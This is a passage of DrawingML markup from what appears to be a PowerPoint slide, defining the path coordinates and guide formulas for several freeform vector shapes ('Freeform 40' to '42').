                  <a:gd name="T36" fmla="*/ 5 w 526"/>
                  <a:gd name="T37" fmla="*/ 405 h 579"/>
                  <a:gd name="T38" fmla="*/ 0 w 526"/>
                  <a:gd name="T39" fmla="*/ 357 h 579"/>
                  <a:gd name="T40" fmla="*/ 11 w 526"/>
                  <a:gd name="T41" fmla="*/ 310 h 579"/>
                  <a:gd name="T42" fmla="*/ 31 w 526"/>
                  <a:gd name="T43" fmla="*/ 263 h 579"/>
                  <a:gd name="T44" fmla="*/ 84 w 526"/>
                  <a:gd name="T45" fmla="*/ 169 h 579"/>
                  <a:gd name="T46" fmla="*/ 147 w 526"/>
                  <a:gd name="T47" fmla="*/ 79 h 579"/>
                  <a:gd name="T48" fmla="*/ 184 w 526"/>
                  <a:gd name="T49" fmla="*/ 48 h 579"/>
                  <a:gd name="T50" fmla="*/ 221 w 526"/>
                  <a:gd name="T51" fmla="*/ 22 h 579"/>
                  <a:gd name="T52" fmla="*/ 268 w 526"/>
                  <a:gd name="T53" fmla="*/ 6 h 579"/>
                  <a:gd name="T54" fmla="*/ 315 w 526"/>
                  <a:gd name="T55" fmla="*/ 0 h 579"/>
                  <a:gd name="T56" fmla="*/ 336 w 526"/>
                  <a:gd name="T57" fmla="*/ 6 h 579"/>
                  <a:gd name="T58" fmla="*/ 394 w 526"/>
                  <a:gd name="T59" fmla="*/ 22 h 579"/>
                  <a:gd name="T60" fmla="*/ 425 w 526"/>
                  <a:gd name="T61" fmla="*/ 42 h 579"/>
                  <a:gd name="T62" fmla="*/ 489 w 526"/>
                  <a:gd name="T63" fmla="*/ 95 h 579"/>
                  <a:gd name="T64" fmla="*/ 499 w 526"/>
                  <a:gd name="T65" fmla="*/ 111 h 579"/>
                  <a:gd name="T66" fmla="*/ 525 w 526"/>
                  <a:gd name="T67" fmla="*/ 195 h 579"/>
                  <a:gd name="T68" fmla="*/ 519 w 526"/>
                  <a:gd name="T69" fmla="*/ 236 h 579"/>
                  <a:gd name="T70" fmla="*/ 504 w 526"/>
                  <a:gd name="T71" fmla="*/ 289 h 579"/>
                  <a:gd name="T72" fmla="*/ 446 w 526"/>
                  <a:gd name="T73" fmla="*/ 389 h 579"/>
                  <a:gd name="T74" fmla="*/ 189 w 526"/>
                  <a:gd name="T75" fmla="*/ 268 h 579"/>
                  <a:gd name="T76" fmla="*/ 389 w 526"/>
                  <a:gd name="T77" fmla="*/ 221 h 579"/>
                  <a:gd name="T78" fmla="*/ 394 w 526"/>
                  <a:gd name="T79" fmla="*/ 200 h 579"/>
                  <a:gd name="T80" fmla="*/ 399 w 526"/>
                  <a:gd name="T81" fmla="*/ 179 h 579"/>
                  <a:gd name="T82" fmla="*/ 394 w 526"/>
                  <a:gd name="T83" fmla="*/ 147 h 579"/>
                  <a:gd name="T84" fmla="*/ 383 w 526"/>
                  <a:gd name="T85" fmla="*/ 132 h 579"/>
                  <a:gd name="T86" fmla="*/ 368 w 526"/>
                  <a:gd name="T87" fmla="*/ 121 h 579"/>
                  <a:gd name="T88" fmla="*/ 331 w 526"/>
                  <a:gd name="T89" fmla="*/ 111 h 579"/>
                  <a:gd name="T90" fmla="*/ 315 w 526"/>
                  <a:gd name="T91" fmla="*/ 116 h 579"/>
                  <a:gd name="T92" fmla="*/ 299 w 526"/>
                  <a:gd name="T93" fmla="*/ 121 h 579"/>
                  <a:gd name="T94" fmla="*/ 273 w 526"/>
                  <a:gd name="T95" fmla="*/ 147 h 579"/>
                  <a:gd name="T96" fmla="*/ 236 w 526"/>
                  <a:gd name="T97" fmla="*/ 195 h 579"/>
                  <a:gd name="T98" fmla="*/ 357 w 526"/>
                  <a:gd name="T99" fmla="*/ 273 h 5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26" h="579">
                    <a:moveTo>
                      <a:pt x="168" y="305"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="389" y="221"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="389" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="221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9" name="Freeform 40"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6442075" y="1550988"/>
                <a:ext cx="177800" cy="258762"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 494 w 495"/>
                  <a:gd name="T1" fmla="*/ 83 h 719"/>
                  <a:gd name="T2" fmla="*/ 405 w 495"/>
                  <a:gd name="T3" fmla="*/ 215 h 719"/>
                  <a:gd name="T4" fmla="*/ 473 w 495"/>
                  <a:gd name="T5" fmla="*/ 262 h 719"/>
                  <a:gd name="T6" fmla="*/ 415 w 495"/>
                  <a:gd name="T7" fmla="*/ 341 h 719"/>
                  <a:gd name="T8" fmla="*/ 347 w 495"/>
                  <a:gd name="T9" fmla="*/ 294 h 719"/>
                  <a:gd name="T10" fmla="*/ 174 w 495"/>
                  <a:gd name="T11" fmla="*/ 541 h 719"/>
                  <a:gd name="T12" fmla="*/ 174 w 495"/>
                  <a:gd name="T13" fmla="*/ 541 h 719"/>
                  <a:gd name="T14" fmla="*/ 158 w 495"/>
                  <a:gd name="T15" fmla="*/ 567 h 719"/>
                  <a:gd name="T16" fmla="*/ 153 w 495"/>
                  <a:gd name="T17" fmla="*/ 582 h 719"/>
                  <a:gd name="T18" fmla="*/ 153 w 495"/>
                  <a:gd name="T19" fmla="*/ 582 h 719"/>
                  <a:gd name="T20" fmla="*/ 158 w 495"/>
                  <a:gd name="T21" fmla="*/ 603 h 719"/>
                  <a:gd name="T22" fmla="*/ 179 w 495"/>
                  <a:gd name="T23" fmla="*/ 619 h 719"/>
                  <a:gd name="T24" fmla="*/ 179 w 495"/>
                  <a:gd name="T25" fmla="*/ 619 h 719"/>
                  <a:gd name="T26" fmla="*/ 195 w 495"/>
                  <a:gd name="T27" fmla="*/ 630 h 719"/>
                  <a:gd name="T28" fmla="*/ 195 w 495"/>
                  <a:gd name="T29" fmla="*/ 630 h 719"/>
                  <a:gd name="T30" fmla="*/ 205 w 495"/>
                  <a:gd name="T31" fmla="*/ 635 h 719"/>
                  <a:gd name="T32" fmla="*/ 147 w 495"/>
                  <a:gd name="T33" fmla="*/ 718 h 719"/>
                  <a:gd name="T34" fmla="*/ 147 w 495"/>
                  <a:gd name="T35" fmla="*/ 718 h 719"/>
                  <a:gd name="T36" fmla="*/ 110 w 495"/>
                  <a:gd name="T37" fmla="*/ 692 h 719"/>
                  <a:gd name="T38" fmla="*/ 110 w 495"/>
                  <a:gd name="T39" fmla="*/ 692 h 719"/>
                  <a:gd name="T40" fmla="*/ 74 w 495"/>
                  <a:gd name="T41" fmla="*/ 666 h 719"/>
                  <a:gd name="T42" fmla="*/ 74 w 495"/>
                  <a:gd name="T43" fmla="*/ 666 h 719"/>
                  <a:gd name="T44" fmla="*/ 43 w 495"/>
                  <a:gd name="T45" fmla="*/ 645 h 719"/>
                  <a:gd name="T46" fmla="*/ 22 w 495"/>
                  <a:gd name="T47" fmla="*/ 624 h 719"/>
                  <a:gd name="T48" fmla="*/ 22 w 495"/>
                  <a:gd name="T49" fmla="*/ 624 h 719"/>
                  <a:gd name="T50" fmla="*/ 6 w 495"/>
                  <a:gd name="T51" fmla="*/ 603 h 719"/>
                  <a:gd name="T52" fmla="*/ 0 w 495"/>
                  <a:gd name="T53" fmla="*/ 582 h 719"/>
                  <a:gd name="T54" fmla="*/ 0 w 495"/>
                  <a:gd name="T55" fmla="*/ 582 h 719"/>
                  <a:gd name="T56" fmla="*/ 0 w 495"/>
                  <a:gd name="T57" fmla="*/ 556 h 719"/>
                  <a:gd name="T58" fmla="*/ 11 w 495"/>
                  <a:gd name="T59" fmla="*/ 535 h 719"/>
                  <a:gd name="T60" fmla="*/ 11 w 495"/>
                  <a:gd name="T61" fmla="*/ 535 h 719"/>
                  <a:gd name="T62" fmla="*/ 48 w 495"/>
                  <a:gd name="T63" fmla="*/ 472 h 719"/>
                  <a:gd name="T64" fmla="*/ 231 w 495"/>
                  <a:gd name="T65" fmla="*/ 210 h 719"/>
                  <a:gd name="T66" fmla="*/ 169 w 495"/>
                  <a:gd name="T67" fmla="*/ 167 h 719"/>
                  <a:gd name="T68" fmla="*/ 227 w 495"/>
                  <a:gd name="T69" fmla="*/ 89 h 719"/>
                  <a:gd name="T70" fmla="*/ 284 w 495"/>
                  <a:gd name="T71" fmla="*/ 130 h 719"/>
                  <a:gd name="T72" fmla="*/ 378 w 495"/>
                  <a:gd name="T73" fmla="*/ 0 h 719"/>
                  <a:gd name="T74" fmla="*/ 494 w 495"/>
                  <a:gd name="T75" fmla="*/ 83 h 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95" h="719">
                    <a:moveTo>
                      <a:pt x="494" y="83"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="405" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="83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0" name="Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6534150" y="1652588"/>
                <a:ext cx="293688" cy="292100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 372 w 814"/>
                  <a:gd name="T1" fmla="*/ 89 h 810"/>
                  <a:gd name="T2" fmla="*/ 168 w 814"/>
                  <a:gd name="T3" fmla="*/ 441 h 810"/>
                  <a:gd name="T4" fmla="*/ 173 w 814"/>
                  <a:gd name="T5" fmla="*/ 441 h 810"/>
                  <a:gd name="T6" fmla="*/ 477 w 814"/>
                  <a:gd name="T7" fmla="*/ 178 h 810"/>
                  <a:gd name="T8" fmla="*/ 598 w 814"/>
                  <a:gd name="T9" fmla="*/ 278 h 810"/>
                  <a:gd name="T10" fmla="*/ 404 w 814"/>
                  <a:gd name="T11" fmla="*/ 630 h 810"/>
                  <a:gd name="T12" fmla="*/ 404 w 814"/>
                  <a:gd name="T13" fmla="*/ 630 h 810"/>
                  <a:gd name="T14" fmla="*/ 708 w 814"/>
                  <a:gd name="T15" fmla="*/ 368 h 810"/>
                  <a:gd name="T16" fmla="*/ 813 w 814"/>
                  <a:gd name="T17" fmla="*/ 457 h 810"/>
                  <a:gd name="T18" fmla="*/ 367 w 814"/>
                  <a:gd name="T19" fmla="*/ 809 h 810"/>
                  <a:gd name="T20" fmla="*/ 241 w 814"/>
                  <a:gd name="T21" fmla="*/ 709 h 810"/>
                  <a:gd name="T22" fmla="*/ 435 w 814"/>
                  <a:gd name="T23" fmla="*/ 352 h 810"/>
                  <a:gd name="T24" fmla="*/ 435 w 814"/>
                  <a:gd name="T25" fmla="*/ 352 h 810"/>
                  <a:gd name="T26" fmla="*/ 125 w 814"/>
                  <a:gd name="T27" fmla="*/ 614 h 810"/>
                  <a:gd name="T28" fmla="*/ 0 w 814"/>
                  <a:gd name="T29" fmla="*/ 509 h 810"/>
                  <a:gd name="T30" fmla="*/ 262 w 814"/>
                  <a:gd name="T31" fmla="*/ 0 h 810"/>
                  <a:gd name="T32" fmla="*/ 372 w 814"/>
                  <a:gd name="T33" fmla="*/ 89 h 8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14" h="810">
                    <a:moveTo>
                      <a:pt x="372" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="168" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="809"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="89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1" name="Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6729413" y="1862138"/>
                <a:ext cx="203200" cy="201612"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 221 w 563"/>
                  <a:gd name="T1" fmla="*/ 43 h 558"/>
                  <a:gd name="T2" fmla="*/ 310 w 563"/>
                  <a:gd name="T3" fmla="*/ 6 h 558"/>
                  <a:gd name="T4" fmla="*/ 357 w 563"/>
                  <a:gd name="T5" fmla="*/ 0 h 558"/>
                  <a:gd name="T6" fmla="*/ 400 w 563"/>
                  <a:gd name="T7" fmla="*/ 11 h 558"/>
                  <a:gd name="T8" fmla="*/ 489 w 563"/>
                  <a:gd name="T9" fmla="*/ 69 h 558"/>
                  <a:gd name="T10" fmla="*/ 525 w 563"/>
                  <a:gd name="T11" fmla="*/ 117 h 558"/>
                  <a:gd name="T12" fmla="*/ 551 w 563"/>
                  <a:gd name="T13" fmla="*/ 158 h 558"/>
                  <a:gd name="T14" fmla="*/ 562 w 563"/>
                  <a:gd name="T15" fmla="*/ 200 h 558"/>
                  <a:gd name="T16" fmla="*/ 562 w 563"/>
                  <a:gd name="T17" fmla="*/ 247 h 558"/>
                  <a:gd name="T18" fmla="*/ 547 w 563"/>
                  <a:gd name="T19" fmla="*/ 290 h 558"/>
                  <a:gd name="T20" fmla="*/ 520 w 563"/>
                  <a:gd name="T21" fmla="*/ 337 h 558"/>
                  <a:gd name="T22" fmla="*/ 436 w 563"/>
                  <a:gd name="T23" fmla="*/ 437 h 558"/>
                  <a:gd name="T24" fmla="*/ 389 w 563"/>
                  <a:gd name="T25" fmla="*/ 484 h 558"/>
                  <a:gd name="T26" fmla="*/ 342 w 563"/>
                  <a:gd name="T27" fmla="*/ 521 h 558"/>
                  <a:gd name="T28" fmla="*/ 253 w 563"/>
                  <a:gd name="T29" fmla="*/ 557 h 558"/>
                  <a:gd name="T30" fmla="*/ 205 w 563"/>
                  <a:gd name="T31" fmla="*/ 557 h 558"/>
                  <a:gd name="T32" fmla="*/ 163 w 563"/>
                  <a:gd name="T33" fmla="*/ 547 h 558"/>
                  <a:gd name="T34" fmla="*/ 79 w 563"/>
                  <a:gd name="T35" fmla="*/ 489 h 558"/>
                  <a:gd name="T36" fmla="*/ 37 w 563"/>
                  <a:gd name="T37" fmla="*/ 447 h 558"/>
                  <a:gd name="T38" fmla="*/ 11 w 563"/>
                  <a:gd name="T39" fmla="*/ 400 h 558"/>
                  <a:gd name="T40" fmla="*/ 0 w 563"/>
                  <a:gd name="T41" fmla="*/ 358 h 558"/>
                  <a:gd name="T42" fmla="*/ 0 w 563"/>
                  <a:gd name="T43" fmla="*/ 316 h 558"/>
                  <a:gd name="T44" fmla="*/ 16 w 563"/>
                  <a:gd name="T45" fmla="*/ 274 h 558"/>
                  <a:gd name="T46" fmla="*/ 43 w 563"/>
                  <a:gd name="T47" fmla="*/ 227 h 558"/>
                  <a:gd name="T48" fmla="*/ 121 w 563"/>
                  <a:gd name="T49" fmla="*/ 127 h 558"/>
                  <a:gd name="T50" fmla="*/ 174 w 563"/>
                  <a:gd name="T51" fmla="*/ 80 h 558"/>
                  <a:gd name="T52" fmla="*/ 174 w 563"/>
                  <a:gd name="T53" fmla="*/ 284 h 558"/>
                  <a:gd name="T54" fmla="*/ 153 w 563"/>
                  <a:gd name="T55" fmla="*/ 311 h 558"/>
                  <a:gd name="T56" fmla="*/ 137 w 563"/>
                  <a:gd name="T57" fmla="*/ 337 h 558"/>
                  <a:gd name="T58" fmla="*/ 121 w 563"/>
                  <a:gd name="T59" fmla="*/ 384 h 558"/>
                  <a:gd name="T60" fmla="*/ 127 w 563"/>
                  <a:gd name="T61" fmla="*/ 400 h 558"/>
                  <a:gd name="T62" fmla="*/ 142 w 563"/>
                  <a:gd name="T63" fmla="*/ 421 h 558"/>
                  <a:gd name="T64" fmla="*/ 179 w 563"/>
                  <a:gd name="T65" fmla="*/ 437 h 558"/>
                  <a:gd name="T66" fmla="*/ 216 w 563"/>
                  <a:gd name="T67" fmla="*/ 431 h 558"/>
                  <a:gd name="T68" fmla="*/ 242 w 563"/>
                  <a:gd name="T69" fmla="*/ 415 h 558"/>
                  <a:gd name="T70" fmla="*/ 337 w 563"/>
                  <a:gd name="T71" fmla="*/ 337 h 558"/>
                  <a:gd name="T72" fmla="*/ 394 w 563"/>
                  <a:gd name="T73" fmla="*/ 268 h 558"/>
                  <a:gd name="T74" fmla="*/ 431 w 563"/>
                  <a:gd name="T75" fmla="*/ 216 h 558"/>
                  <a:gd name="T76" fmla="*/ 436 w 563"/>
                  <a:gd name="T77" fmla="*/ 195 h 558"/>
                  <a:gd name="T78" fmla="*/ 431 w 563"/>
                  <a:gd name="T79" fmla="*/ 158 h 558"/>
                  <a:gd name="T80" fmla="*/ 421 w 563"/>
                  <a:gd name="T81" fmla="*/ 143 h 558"/>
                  <a:gd name="T82" fmla="*/ 378 w 563"/>
                  <a:gd name="T83" fmla="*/ 121 h 558"/>
                  <a:gd name="T84" fmla="*/ 357 w 563"/>
                  <a:gd name="T85" fmla="*/ 127 h 558"/>
                  <a:gd name="T86" fmla="*/ 331 w 563"/>
                  <a:gd name="T87" fmla="*/ 132 h 558"/>
                  <a:gd name="T88" fmla="*/ 284 w 563"/>
                  <a:gd name="T89" fmla="*/ 174 h 558"/>
                  <a:gd name="T90" fmla="*/ 226 w 563"/>
                  <a:gd name="T91" fmla="*/ 227 h 558"/>
                  <a:gd name="T92" fmla="*/ 174 w 563"/>
                  <a:gd name="T93" fmla="*/ 284 h 5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563" h="558">
                    <a:moveTo>
                      <a:pt x="221" y="43"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="221" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
